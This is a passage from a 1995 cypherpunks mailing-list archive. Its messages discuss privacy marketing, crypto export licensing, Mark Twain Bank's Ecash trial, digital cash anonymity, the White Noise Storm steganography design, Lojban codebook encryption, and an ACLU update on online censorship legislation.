are performed on remote databases, well hidden from the customer.
If customers aren't concerned about their privacy, then why the need for
all the distracting gimmicks and giveaways?  Why not just promote these
programs straightforwardly to the customer as "Customer Tracking
Programs"?  A competitor who can provide a privacy protecting solution
can do just that, damaging these tracking programs severely.

* It is ludicrous to argue that cash transactions, which leave no
identified paper trail, provide no practical privacy.  In fact they
prevent detailed compilation of lifestyle habits, by (a) not
depending on identity to settle the transaction, (b) making
identity tracking, where it occurs, a visible, separate process, and
(c) making it too expensive to track identity via the payment system itself,
except in extreme, very rare cases.  In practice, this means that cash
customers don't get their lifestyles described in detail in remote
databases, while non-confidential electronic payers increasingly do.
Eventually this sharp difference in outcome will feed back to the
customer, greatly increasing the demand for cash over non-confidential
electronic payment.

* A big challenge for vendors value-adding privacy is to accurately
communicate these privacy features, through both the user interface and their
marketing, while debunking fraudulent claims (such as calling
non-confidential payment systems "cash") and exposing the privacy
violating actions of their competitors.

I conclude that privacy marketing will be an important value-add for
Internet commerce.  It will be a terrific way to gain market share at
the expense of the competition  -- or to lose much of your market share,
if you find yourself on the wrong end of a privacy campaign.


Nick Szabo                              szabo@netcom.com
Consultant, Internet Commerce & Security
IBM, Sequent, DigiCash, Agorics
Nine years experience on the Internet

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 25 Oct 95 12:47:44 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510251945.OAA25027@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Even if the T-shirts are a joke, it seems like applying for an export
license is a win-win proposition.  If the government denies the license,
they end up looking extremely silly and it's easier to point out to
Joe Sixpack (or a judge) how silly ITAR is w.r.t. cryptography.  If they
grant the license or say one isn't necessary, it might open up the way for
"cypherpunk party-streamers" which also happens to be your favorite crypto
program on colored paper tape or perhaps even limited edition, hand painted,
collectable cypherpunk CDs containing mostly music but with a data track or
two.

The only bad response would be none at all, so I think pushing for one
is worthwhile even if the answer is "that's a frivolous request".


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Wed, 25 Oct 95 11:55:00 PDT
To: leonardr@aladdinsys.com (Leonard Rosenthol)
Subject: Re: Quick commercial package question
Message-ID: <v02120d02acb446206c09@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 AM 10/25/95, Leonard Rosenthol wrote:

>At 10:57 PM 10/24/95, Marshall Clow wrote:
>>>        http://www.uccs.edu/~abusby/mac_u-g/RemoveIt.sit.bin

<...>

>        If you know the person who wrote or posted the information, please
>feel free to forward my message along to him.

        I don't know the person, but I posted your note--and, BTW, thanks
for responding--to alt.hackintosh, where the above web page proffering this
pseudo-crack is regularly mentioned; I know that "abusby" monitors the
group (and maintains a big hacking BBS), so hopefully he'll pull the crack
from circulation.

Cheers. And thanks, also, for all of your very excellent work.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 25 Oct 95 12:01:59 PDT
To: hallam@w3.org
Subject: Re: Mark Twain Bank (was: Anonymity: A Modest Proposal)
Message-ID: <199510251901.PAA28429@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


For those interested in the first bank to back Ecash:

Mark Twain Bank opened to serve the wealthy suburbs of Saint Louis (Ladue
and Town & Country) a few years ago.  It was meant to be a public "private
bank" for sophisticated customers.  

A few years ago when the rules were eased, it started offering accounts and
CDs denominated in 25 foreign currencies.  These accounts were meant for
international investors and business types in the area.  They were
discovered by "hard money" newsletters and became popular with that crowd.
They have been the cheapest place to get foreign currency accounts in the
US.  Initially, the bank didn't realize that this sort of "hedge" market
existed but have since exploited it fairly well.

These accounts are FDIC insured up to $100,000.00 in $US equivalents.
Obviously, exchange losses are not covered by FDIC insurance.

The Ecash trial involves opening a World Currency Access Account which *is*
FDIC insured and using it to fund your Ecash account which is *not* insured.
They are treating the Ecash Mint part of their operations and the various
customer Ecash accounts as investment accounts (hence the investor
sophistication disclosure questions on the application form).  

Unanswered questions --- What will the SEC say?

Mark Twain seems to be carrying on the fine old tradition of Saint Louis
banks being a bit independent and out in front of the crowd.  Other examples
include Southwest Bank always leading the nation on Prime Rate changes and
the Saint Louis Federal Reserve Bank (the only FRB to publish a hard money
newsletter).

I may wait for the Swedish Postal Bank to start offering its Ecash accounts
just cause I like foreign climes.

DCF

"The Revolution will *not* be FDIC insured BTW." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 25 Oct 95 12:03:29 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: CJR returned to sender
In-Reply-To: <199510251652.MAA08998@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951025145947.21444H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Oct 1995, Perry E. Metzger wrote:

> Michael Froomkin writes:
> {words to the effect of "enough already"}
> 
> I was unaware, Mr. Froomkin, that the legal system of our country had
> the right to arbitrarily ignore its own rules and refuse to answer a
> question. The munitions T-Shirt was not, in my opinion, substantially

Yes, it has an obligation to answer.

> more frivolous than Phil Karn's floppy, which was rejected. I do not

We disagree.

> believe that the state department has the right to reject such things
> by refusing to accept their mail, and I do not believe that they have

This assumes a conscious decision was made; I'm more inclined to think 
it's a screw up.  In any case, sending it registered mail, or by 
courier, would remove the doubt.

> the right to violate their own procedures. If someone asks "is this
> captain midnight decoder ring exportable" they are legally obligated
> to answer, one way or the other, unless we live under a government of
> men, and not laws.
> 
Yes.  I just hope the members of this list have more sense than to do 
frivolous things, although of course I defend their legal right to do 
so.  Of course, one part of being wise is picking the right fights.

This will be my last comment on this thread.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ali@eit.COM (Ali Bahreman)
Date: Wed, 25 Oct 95 15:33:00 PDT
To: ljo@ausys.se
Subject: Digital Cash, Privacy, Anonymity, Double spending protection and Cheating protection
Message-ID: <199510252228.PAA21470@penetralium.eit.com.>
MIME-Version: 1.0
Content-Type: text/plain


Let's think out loud here for a minute...  I am sending this to Cypherpunks to 
see if someone out there has already thought of a solution to this.

Alice wants to get a file from Bob and wants to pay him $1 using some Digital 
Cash scheme.

- Do we want Alice's identity to remain Anonymous (and Bob's too)? (Note that 
  this means that neither party knows who the other really is.  They could be 
  using aliases to conceal their real identity.)

- Do we want both Alice's & Bob's Privacy maintained in the interactions. (Note 
  the separation of Privacy and Anonymity with the former referring to the fact
  that the transaction detail is only known between the parties involved.  The 
  transaction detail includes, knowledge of what was purchased, how many, and 
  in the ideal case between which parties!  Those parties could have used an 
  alias and therefore have remained Anonymous independent of whether their 
  Privacy was maintained.  Privacy also means more than simple confidentiality 
  because it may involve having a merchant, for example, not maintain a database
  of purchasing habits, or if it does maintain such a database, keep it to 
  itself.)

- Do we want to prevent Alice from double spending (and Bob too)?

- Do we want to protect either party from cheating each other?

- Do we want a self-enforcing protocol?  (e.g. No need for Bob to verify the 
  e-coins with a Bank every time.)

- Do we want minimum book-keeping by each party for practical implementations?

- Have I missed more?  Tax, Export, etc (beyond the scope of this email ;-)


The question is can all of the above requirements be achieved?  AND Are they 
all required/desired? 

I know cryptography does wonders, but I ponder upon 1) the need to satisfy
all the above requirements, as well as 2) the feasibility of such a solution.

At first glance, it appears that Anonymity and Double spending prevention are
contradictory.  You want to punish a double spender and you need to know their
identity to do that.  Also, Privacy covers a broader scope than cryptographic 
protocols can address (e.g. the merchant database.)  Finally, to prevent/punish
cheating using a third party requires the loss of both Privacy and Anonymity as
the third party/judge is presented with the transaction details and asked to 
arbitrate.  Nevermind the other requirements for now... :-)

Please include me in all responses.  Thanks.

Ali




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 25 Oct 95 13:54:51 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Mandatory ID in California?
In-Reply-To: <199510251617.MAA23789@panix.com>
Message-ID: <Pine.SV4.3.91.951025152409.3136C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


"States may not authorize arrest...for failing to produce identification..."
       Kolender v. Lawson 461 U.S. 352 (1983)

"...may not compel an answer and they must allow the person to leave 
after a reasonable brief period of time...."  - - ibid


California is the Ninth Circuit, no?  See, inter alia,  Martinelli v. 
City of Beaumont, 820 F.2nd 1491 (1987).

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 25 Oct 95 15:37:04 PDT
To: cypherpunks@toad.com
Subject: Re: Mark Twain Bank [good news]
Message-ID: <v02120d06acb4792cdc01@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Also note that, per a conversation w/Frank Trotter, there are
no minimum balances for those wanting to just establish ECash
accounts. There is also no significant operational difference
between merchant and customer accounts (it's mostly a matter
of fees.) Individuals can set up shops w/personal accounts.

Frank seems to think that he posted an announcement to this
effect to cypherpunks in the middle of the night last night. I
suspect he was tired.

(I'm apparently account number 10; the software should be put
 up for download by Marcel either tonight or tomorrow. He's
 apparently playing squash.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Wed, 25 Oct 95 12:48:41 PDT
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
In-Reply-To: <acb3ab3f06021004ee7e@[205.199.118.202]>
Message-ID: <9510251948.AA28612@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 25 Oct 1995 09:08:15 -0700
   X-Sender: tcmay@mail.got.net
   Mime-Version: 1.0
   Content-Type: text/plain; charset="us-ascii"
   From: tcmay@got.net (Timothy C. May)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk

   At 6:35 AM 10/25/95, Timothy C. May wrote:
   >
   >(* Hal Abelson of MIT says there are possible export problems with the MIT
   >Press book on PGP, and MIT dropped plans for a version in a special OCR
   >font. So, I agree that _some_ books cross the line and look like pure
   >software. However, I continue to maintain that a badly-printed barcode is
   >just a joke, nothing more.)

   Brian LaMacchia sent me e-mail saying the MIT book _was_ published with the
   OCR font as originally planned. No response to their CJR request, submitted
   in Jan or Feb.

[Blatant plug for MIT Press...]

For reference, the title of the book is "PGP: Source Code and
Internals", ISBN 0-262-24039-4, hardcover, $60.00.  There are links to
the MIT Press pages from my keyserver home page
(http://www-swiss.ai.mit.edu/~bal/keyserver.html), or you can go to MIT
Press's site (http://www-mitpress.mit.edu/) and look under
Books/Computer Science.  Orders accepted over the net using either HTML
forms (SSL) or e-mail (PGP).

MIT Press is also selling "MIT PGP" T-Shirts, but I don't have pricing
or size information on them yet.  They have the logo from the book cover
on the front & back.  Front says "Mind your own business," back has a
copy of MIT Press's PGP public key (in ASCII-armored form).

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Wed, 25 Oct 95 13:03:23 PDT
To: cypherpunks@toad.com
Subject: Public key Steganography?
Message-ID: <Pine.SUN.3.91.951025155533.6824J-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain



The following are bits and pieces of a message I've sent to someone 
inquiring about stego...  It brought back the old idea I had about 
expanding WNS to do public key....  Would something like this be 
feasible?  The beginning of this is a description of what WNS does, 
followed by the public key idea...

---------- Forwarded message ----------

<<I am researching Steganography and related topics of a security course at 
George Mason University.  As part of my research, I am reviewing PC 
products that provide such services.  White Noise Storm (tm) which you 
developed is one such product.  I am interested in the kind of research 
you did to develop it (publications, readings, inspiration).  If you 
could point me to any documents I would be grateful.>>

Hi there,

Anyway to answer your questions, the idea of WNS came to me from the idea of
spread spectrum technology and frequency hopping, however, I added several
twists to it in order to improve security.  Instead of just having X channels
of communication which are multiplexed or changed with a fixed formula and
passkey, I have eight channels which are spread within a number of 8 bits*W
bytes channels.  W here represents a random sized window of W bytes.  Each of
these eight channels represents one single bit out of a whole byte, so each
Window holds one byte plus a bunch of unused bits.  These channels rotate
among themselves, for instance bit 1 might be swapped with bit 7, or all the
bits may rotate positions at once.  Further, these bits change location
within the window on the byte level.  The rules for these swaps (similar to
the substitution boxes in other cyphers) are dictated not only by your
passphrase - which is unlimited in length, but also by the previous window's
random data.   

This means that if you encrypt message M with key K two times, you get two
different cyphertexts, C.  C1 and C2 may be different, however, decrypted
with key K, both will yield the original message M.  This makes cryptanalysis
very hard because the same message will give you different cyphertexts each
time, thus making known cyphertext attacks useless.  (Of course if you don't
use random numbers, but rather the LSB's in an image, the same passphrase and
the same window size, you'll get the same cyphertext each time you run it -
which is one of the reasons you should destroy the original picture after
injecting it.  More about this later.)

Since the window size changes with each window, the bits both rotate among
themselves, and within the data window, it is close to impossible for an
attacker to guess where there is cyphertext data versus where there is random
data, which bit in that cyphertext represents what bit value, and in which
byte it is located in. 

The unused bits are actually random data when WNS is used by itself generated
by either a hardware random number generator, or by your compiler's random
functions which admittedly aren't all that great.  However, if you are using
WNS for steganography, that random data is actually the least significant
bits of your original file, be it sound, or a picture or whatever.  An
injector is included for the PCX format because that is a format I am most
familiar with, however you may write your own for other media.

The reason I'm using live data out of the file you want to hide a message in
is so that the cyphertext produced by WNS closely matches the natural, native
LSB's of that file.  Also, WNS, when used with a large enough maximum window
size will give you a very secure stego channel since it will be very hard to
detected that 1 in say, 500 bits has been altered.  That's a bit extreme and
will waste a lot of data, but for small messages stored in very large
complex, noisy files, will look very much like the original image.

Another thing to throw off the attacker is statistical fixing.  If WNS
writes a 1 bit over a 0 bit of an LSB file, it will look for an unused 1 bit
to write a zero over.  This balances the distribution of 0 and 1 bits to
match that of the original file as closely as possible, so that you cannot
use statistical analysis to even detect the presence of steganography, much
less break it.

Additionally, WNS's schema of steganography does give you a very strong
advantage: your recipient does not need to have the original picture or sound
in order to extract the hidden message.  There is a huge concern about this
since if, as some other algorithms require, your recipient needed to have the
original picture, you can bet that the bad guys would also have it and
compare the two and also be able to extract the message.  It is a good idea
for nobody to have the original image, not even you.  That is, scan something
in, inject your message in it, and destroy the original.   If the bad guys
search your hard drive and find the original picture, they can compare it to
the one you've sent which contains the data, thus they are able to find out
which bits WNS has changed, and possibly analyze the algorithm to see which
passphrases would generate such bits, extract the passphrase and then the
message.

With the original pre-WNS210 version, it was possible to break an encrypted
message by decoding it repeatedly with the same password while changing one
bit at a time in a window so as to find out which bits WNS wrote and which
were random, however this brute force method is a lot worse than most brute
force methods because given a stream of bits, and an unlimited password size
you have numbits^numpasswords combinations to work with - a very huge space
size for bruting, even for small messages.

However, this version uses not only the previous window's plain-text, but the
current window's unused random data bits to form the next window, that is in
a sense the algorithm is recursive.  (Not that the encryption function calls
itself, but rather it uses the previous window to form the next.)

Keep in mind that no-one, to my knowledge has done a differential
cryptanalysis or any other formal attempt to break this code.  It is possible
that the boys at the NSA would attempt this if they thought it was a threat
to them, but I haven't seen anyone report any weaknesses in this algorithm.
This is why I suggest that whatever you send with WNS be compressed and then
encrypted with something like PGP first.  That extra bit of entropy generated
by first compressing, and then by encrypting with RSA and IDEA will increase
the entropy in your cyphertext even if the LSB's from the host picture aren't
all that random.

Related subjects from which I was inspired to write WNS: random numbers, the
sliding window protocols such as Zmodem which change their window size
depending on how noisy the channel is - WNS changes the window size to
improve security, not to help against noise - in fact, if you change a single
byte in a WNS cyphertext, the rest of the message gets garbled completely.
Spread spectrum and channel hopping radio communications, finite state
machine automatons, steganography and stealth in general, etc.

At the time I wrote this, I did not have any papers I used to write this
code, only my own knowledge of the above topics, things I learned in school
about automatons and spread spectrum, the Zmodem protocol description of DSZ,
etc.

I would like to sometime in the future expand WNS to use a public key system
instead of a symmetric key, but I haven't yet found a feasible way to do
this.  As is, you'd have to know your recipient's private key in order to
encrypt something to send them.  If you do, it beats the whole point of
public key encryption.  If you use their public key, everyone has access to
it, so it's a kind of a catch 22 here.

Using their public key as the initial WNS key, then using an RSA encrypted
block to send the session key for WNS will produce the RSA encrypted block -
while this is fairly strong, RSA might have some tell-tale signs that would
give away the presence of steganography in the message?  I'm not sure how
insecure or secure this would be, but so far it is the only idea I have.

This would basically work like this:

  1. pick a randomly generated session key for the IDEA cypher, call this K1
  2. pick a randomly generated session key for the 2nd part of the WNS
     session, call this K2.
  3. Use the recipient's public key Pub for an RSA or Diffie-Hellman session
     key exchange.
  4. Encrypt Sessionkey=RSA(K1+K2,Pub)
  5. Encrypt Sessionblock=WNS(Sessionkey,randomnumbers,Pub) and merge with
     random numbers generating a random sized block.
  6. First encrypt blocks of your plaintext with idea using
     cyphertext1=IDEA(plaintextblock,K1)
  7. Then encrypt and write cyphertext2=WNS(cyphertext1,randomnumbers,K2) to
     the output file.
  8. Go to 6 until no more data to write.

To decrypt (you are the recipient):

  1.  Set the session key to your public key Pub.
  2.  Decrypt the start of the stegoed picture using WNS and your public key
      to get K1 and K2:
        K1+K2=WNSDecrypt(cyphertext2,Pub) -> here cyphertext2 comes from the
        file
  3.  Decrypt next block of code using cyphertext1=WNSDecrypt(cyphertext2,K2)
  4.  Decrypt the cyphertext1 with IDEA
        plaintext=IDEADecrypt(cyphertext1,K1)
  5.  Goto 3 until no more data.

Problem is, how much does it weaken WNS to use your recipient's RSA's public
key as the initial WNS key not only in terms of security, but also in terms
of allowing the attacker to detect the presence of stego'ed data in your host
image?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 25 Oct 95 00:15:16 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: A secure cryptosystem with a 40-bit key?
In-Reply-To: <199510232334.TAA11134@universe.digex.net>
Message-ID: <199510250657.QAA10183@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Scott Brickner <sjb@universe.digex.net>
 
S.B. wrote:

...[lojban]...

Well, I don't know lojban, but I've had a glance at it...

...
> All "native" Lojban words are of entirely predictable forms.  "Root"
> words are all five characters containing three consonants and two
> vowels in one of two patterns (CCVCV and CVCCV).  "Structure" words have
> four forms (VV, CV, CVV, and CV'V).  "Combining forms" have two forms
> (CVC and CV'C).  All other words are not "native" words (being either
...

.u'u I believe that you were wrong when you expressed a symbol for the
list of forms of structure words. There are also words of the form V'V.

On the other hand, however, not all letter combinations are permitted;
eg there are only fourteen diphthongs (of which only four are "normal").

> The grammar of the language is *so* regularized that they are able to
> give a YACC description for it.

Yeah, and a huge beast it is. If you can make a YACCable language with
one page of rules (say 16 :-) ), *then* I'll be impressed.

Would you believe two grammars for mathematical expressions? No? Good!
There are three (infix, prefix and postfix).

> A message written entirely using native Lojban words can be encrypted
> in a codebook fashion where the particular codebook to be used is a
...

You have to be careful here - the structure words (cmavo) are divided
into groups (selma'o) which have different grammatical functions.
You can't mix up members of different selma'o (in general), so you'd
have to permute within each separately.

Some of these selma'o have very few members (even just one) and/or
may of themselves reveal information.

> This system has the interesting property that *any* plaintext with the
> same grammatical structure is a potential encryption of a given
> cyphertext.
...

Yes, but the grammatical structure itself may reveal heaps.
(Except for trivial statements.)

...
> There's still the problem of borrowed words and proper names, which
...
> could be sent spelled-out.

Yup, including font changes, if memory serves!

> This works well in Lojban because it never changes word forms based on
> grammatical usage.  Most natural language declensions and conjugations
> would make the encrypted message ungrammatical, and make it *much* more
...

Not really; you just need to make sure that you conjugate the coded words.
(Ie substitute nouns for nouns, verbs for verbs, etc.)


In Esperanto, the normal word roots (those that need an ending) would
be easy enough to permute... For the rest, you'd have to be careful about
structure words like "cxu" (which turns the sentence into a question),
conjunctions etc which go at specific places of the sentence.

There's plenty enough prepositions to permute :-)

You can probably make do with 1000-2000 words in Esperanto, making
the codebook somewhat more manageable than in other languages.

On the other hand, you would probably have to be careful to delineate
the boundaries, as confusion could result (the breaking up of an E-a
word into the component roots is not necessarily unique, leading to puns
ranging from beautiful (diamanto) through the weird (amoro) to the horrible).
Perhaps that would be a feature, though?


Adiaux!

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMI3fzSxV6mvvBgf5AQE2VAQAxVwmHaku0rwpGswl8RBZa8q4Xm/yv5wh
uMNPl1b4FXPeJplsGGRqBnwgOL0+zcAowKIvkVJBeg2zB95ZGFcQW5IKVRg7tnR8
vX8khTwnRG3y0NcvMdFjPwn38gu4j8gyvMRHk5/x9sM1228zqQ/+0FrMD063geVw
Q1476RGREq4=
=YhgP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Wed, 25 Oct 95 17:58:11 PDT
To: beeson@aclu.org
Subject: ACLU Cyber-Liberties Update
Message-ID: <951025170122_54177496@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------
October 25, 1995
ACLU CYBER-LIBERTIES UPDATE
A bi-weekly e-zine on cyber-liberties cases and controversies at the state
and federal level.
-----------------------------------------------------------------
IN THIS ISSUE:

*  Universities Censor Student Internet Use

*  Conferees Named for Federal Online Indecency Legislation

*  Search for Plaintiffs Continues in Suit to Challenge Online
Indecency Legislation

*  Effect of Telco Bill on Universal Access

*  Conferences
-----------------------------------------------------------------
STATE PAGE (Legislation/Agency/Court Cases/Issues)
-----------------------------------------------------------------
*    Universities Censor Student Internet Use

In a knee-jerk reaction to the cyber-porn scare, many universities
around the country have begun to enact policies
to regulate student Internet use.  The ACLU believes that
university censorship of student Internet usage is inconsistent
with the principles of academic freedom.  In addition, state
universities are required as state institutions to uphold the
free speech guarantees of the First Amendment.  The Internet
flourished for years as primarily an academic -- and uncensored --
domain.  Colleges should not now cave in to the Luddites by
enacting restrictive computer usage policies.

Here are a few examples of university computer usage policies
that tread on cyber-liberties:

*  After a year-long battle that made national news, Carnegie
Mellon University is expected this November to approve a policy
to censor certain Usenet newsgroups on Andrew, their flagship
computing system.  Their decision to censor is based on fear that
the university could be held criminally liable under state
obscenity and harmful to minors laws for providing access to
newsgroups that "might be" obscene.  The administration refused
to accept the suggestion of both the CMU Faculty Senate and the
ACLU that the computer network be categorized as a library, which
would entitle the network to an exemption from the Pennsylvania
obscenity statute.

*  The University of Minnesota will not allow students to have
"offensive" content on their web sites, or even to create links
to "offensive" content elsewhere on the Internet.  They have also
adopted the double standard of commercial services like America
Online and Prodigy -- despite U of Minn's explicit content
control, student web pages must include a disclaimer that the
university takes "no responsibility" for anything on the pages.

*  At George Mason University, the "Responsible Use of Computing"
policy begins with the following statement:  "The following rules
are not complete; just because an action is not explicitly
proscribed does not necessarily mean that it is acceptable." 
(One could hardly imagine a better example of ambiguity with the
potential to chill protected speech.)  The policy creates a
Security Review Panel that investigates reports of "offensive"
computer behavior.  As could be predicted, the backlog of cases
before this panel is already quite long.  (The head of the
Security Review Panel is none other than Dr. Peter Denning,
husband of Dr. Dorothy Denning, infamous proponent of the Clipper
Chip.)

On the bright side, students and faculty groups continue to hotly
oppose these policies when they arise, and have been instrumental
in shaping Internet usage policies to be less inhibitive of free
speech and privacy rights.  The following online resources will
be useful to students and faculty faced with a draconian Internet
usage policy:

*  Report on Computers at Harvard, by the Civil Liberties Union
of Harvard: _Very_ comprehensive and useful report on students'
computer usage rights on Harvard's network.  Included are five
general principles for computer use, an application of the
general principles to specific aspects of computer use, and a
discussion of areas where Harvard should take immediate action to
secure students' rights on the network.  Available at
gopher://fas-gopher.harvard.edu:70/00/.studorgs/.cluh/.computer_report

*  Web Site on CMU Censorship Proposal:  Thorough history and
database of documents on Carnegie Mellon University's battle over
online censorship. Also includes information on CMU's Coalition
for Academic Freedom of Expression (CAFE).  See
http://www.cs.cmu.edu/afs/cs/usr/kcf/www/censor/

*  ACLU letter and legal analysis to CMU:  send a message to
infoaclu@aclu.org with "Letter to CMU" in the subject line.

The ACLU will continue to monitor university policies that
restrict online free speech and privacy rights.  The ACLU urges
all students and faculty to actively work for university computer
usage policies that protect their rights.  To inform the ACLU of
a computer usage policy at your school that may violate
cyber-liberties, contact Ann Beeson, ACLU, beeson@aclu.org.
-----------------------------------------------------------------
FEDERAL PAGE (Congress/Agency/Court Cases)
-----------------------------------------------------------------
*    Conferees Named for Federal Online Indecency Legislation

Congress recently named the official conferees to the
telecommunications bill.  The Senate version of the telco bill (S
652) contains the Exon Amendment, approved 84-16 by the Senate on
6/14/95.  The House version of the telco bill (HR 1555) contains
the Cox/Wyden Amendment (the Internet Freedom and Family
Empowerment Act), approved 421-4 on 8/4/95.  The House version
also contains Exon-like amendments to the existing federal
obscenity statute, which came out of the House Judiciary
Committee and were adopted as last-minute additions through a
larger Manager's Amendment on 8/4/95.  The conference committee
is in charge of reconciling the differences between the House and
Senate versions of the telco bill, including the obviously
incompatible provisions regarding online content.

While more details are offered in the list below, the following
facts should be highlighted:

_Notable Conferees_
-Senator Exon:  sponsored the Exon Amendment and launched the
cyber-porn scare.
-Senator Gorton: original co-sponsor of the CDA.
-Representative Hyde: sponsored the inclusion of indecency
amendments to the federal obscenity laws in the House telco bill.
-Representatives White, Markey, Goodlatte, Fields, and Barr:  
spoke in favor of Cox/Wyden amendment on the House floor during
the telco debate.

_Some Absent Conferees_
-Members of the Senate Judiciary Committee.
-Senator Leahy: sponsored the study alternative to the CDA in the
Senate (Senator Leahy is a member of the Senate Judiciary
Committee).
-Representatives Cox & Wyden: sponsored the Cox/Wyden "Internet
Freedom and Family Empowerment Act."
-Senators who voted against the CDA.

_Other Notable Facts_
-All the Senate conferees voted for the CDA.
-All the House conferees voted for the Cox/Wyden amendment.
-All the House conferees also voted for the Exon-like indecency
amendments to federal obscenity laws.  However, they may not have
been aware of this vote because it was not a separate vote but
rather a vote to approve the Manager's amendment, which contained
many provisions unrelated to the censorship legislation.
-Given the conferees named, it is highly likely that the House
leadership, including House Speaker Newt Gingrich, will play a
substantial role in the conference process.

THE LIST OF CONFEREES:

Conferees from the House were assigned to particular titles of
the telco bill; Senate conferees have jurisdiction over all
titles.  The list that follows indicates the titles over which
each conferee has jurisdiction, and the conferee's relevant
committee status, party, and area of constituency.

*Title I: Development of Competitive Telecommunications Markets
(contains the Cox/Wyden amendment)
Title II: Cable Communications Competitiveness
Title III: Broadcast Communications Competitiveness
*Title IV: Effect on Other Laws
(contains the Exon Amendment and the Exon-like indecency
amendments to the federal obscenity statute)
Title V: Definitions
Title VI: Small Business Complaint Procedure

Representatives from the House:

Jurisdiction over Titles I and IV (these conferees may
participate in discussions to reconcile the conflicting online
content provisions in the Cox/Wyden Amendment, the Exon
Amendment, and the Exon-like indecency amendments to the federal
obscenity statute):

Representatives from the House Commerce Committee, in order of
rank:

Republicans:

Bliley, Thomas J. (Richmond, Virginia) all titles
Fields, Jack (Houston, Texas) all titles
Oxley, Michael G. (northwest Ohio) all titles
White, Rick (northwest Washington) all titles
Barton, Joseph (Fort Worth, Texas) I, II, IV, V
Hastert, J. Dennis (northeast Illinois) I, II, IV, V
Klug, Scott (Madison, Wisconsin) I, III, IV, V, VI

Democrats:

Dingell, John D. (southeast Michigan) all titles
Markey, Edward J. (northeast Massachusetts) all titles
Boucher, Rick (southwest Virginia) all titles
Eshoo, Anna G. (San Francisco Bay Area, California) all titles
Rush, Bobby L. (Chicago, Illinois) all titles

Representatives from the House Judiciary Committee, in order of
rank:

Republicans:

Hyde, Henry J. (Chicago, Illinois) all titles
Moorhead, Carlos J. (Los Angeles area, California) all titles
Goodlatte, Robert W. (Western Virginia) all titles
Buyer, Steve (northwest Indiana) all titles
Flanagan, Michael P. (Chicago, Illinois) all titles

Democrats:

Conyers, John (Detroit, Michigan) all titles
Schroeder, Patricia (Denver, Colorado) all titles
Bryant, John (Dallas, Texas) all titles

Title I only (these conferees may participate in discussions to
revise the Cox/Wyden Amendment, but may not participate in
discussions to reconcile the conflicting online content
provisions in the Cox/Wyden Amendment, the Exon Amendment, and
the Exon-like indecency amendments to the federal obscenity
statute):

Representatives from the House Commerce Committee, in order of
rank:

Republicans:

Paxon, Bill (western New York) I, III
Frisa, Dan (New York, New York) I, II
Stearns, Cliff (northeast Florida) I, III

Democrats:

Brown, Sherrod (northeast Ohio) I
Gordon, Bart (central Tennessee) I
Lincoln, Blanche Lambert (northeast Arkansas) I

Representatives from the House Judiciary Committee, in order of
rank:

Republicans:

Gallegly, Elton (southern California) I
Barr, Bob (western Georgia) I
Hoke, Martin R. (northeast Ohio) I

Democrats:

Berman, Howard L. (Los Angeles area, California) I
Scott, Robert C. (Richmond, Virginia) I
Lee, Sheila Jackson (Houston, Texas) I

Conferees from the Senate Commerce Committee, in order of rank
(the Senate conferees have jurisdiction over all titles):

Republicans:

